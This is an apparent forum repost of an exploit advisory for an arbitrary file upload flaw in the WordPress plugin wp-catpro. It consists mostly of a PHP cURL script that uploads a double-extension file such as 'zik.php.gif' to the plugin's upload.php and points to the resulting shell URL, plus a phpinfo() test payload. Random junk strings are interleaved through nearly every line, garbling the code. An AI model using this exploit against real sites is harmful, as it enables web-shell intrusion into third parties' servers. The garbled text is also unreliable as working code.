Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability3 I, Q" E( y- E. [3 L! Q' e
#-----------------------------------------------------------------------
& Y' R- U+ k8 M1 \2 J# s 5 i7 Y; l+ K( F% |, ^* U
作者 => Zikou-16
; b# q3 a+ C$ G2 H, `% v; d6 z4 w邮箱 => zikou16x@gmail.com5 d, ?0 p! W* l
测试系统 : Windows 7 , Backtrack 5r3
4 X9 R- L5 K) C# y7 b, v n下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
4 m' l. V. [1 b' ]5 N####
" q% G. q- W- c! w+ C
& D8 I$ M: C# j) F#=> Exploit 信息:
% N; G1 t# Y L------------------3 w; b7 `, X( f/ w" e
# 攻击者可以上传 file/shell.php.gif( |! x8 P2 w( N6 v
# ("jpg", "gif", "png") // Allowed file extensions; B* \7 ^) v/ w* C3 ~! y0 Z
# "/uploads/"; // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)! q! l$ z7 L- Z/ ~1 [
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
. c/ W* q- E# o8 Q) u2 ?------------------
1 R2 t2 G" m' H: Y3 w
) ~7 L. X ^* R8 t& G#=> Exploit O* w, C) I) t' V% I& |2 _0 ]
-----------. W1 z" o* i# a
<?php# ^. R* Y, y" G
" a" m# B) H- x0 o" l
$uploadfile="zik.php.gif";) Z. y" p" I/ g( v
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");* T) p5 r# R1 E# f* v
curl_setopt($ch, CURLOPT_POST, true);" x- I- Q. O& W* p3 Q5 z, q
curl_setopt($ch, CURLOPT_POSTFIELDS,6 r# e) t( @7 p$ B1 X& K
array('Filedata'=>"@$uploadfile",; ]; l* c u) \
'folder'=>'/wp-content/uploads/catpro/'));
$ C1 W! D7 M# i+ ?5 J0 K) Hcurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
5 ~" U2 C" Q$ E3 Z6 g- w0 X$postResult = curl_exec($ch);
! x, k" w# y) s bcurl_close($ch);
, i6 s7 [( L; G* \2 }8 j 4 S9 O. G+ a+ k" h0 T! o
print "$postResult";
+ v1 F: D) `( f' e& ?* `0 b1 k
, o6 u' c# X! cShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif j! A+ b% J) Q6 y, d
?>2 c j8 L- Q2 U3 P5 D: a5 h' M
<?php
; v, S# S5 l" E: [2 {phpinfo();
9 `. L5 T! K6 M) Z! W?> |
发表于 2013-2-27 20:12:43
收藏
支持
反对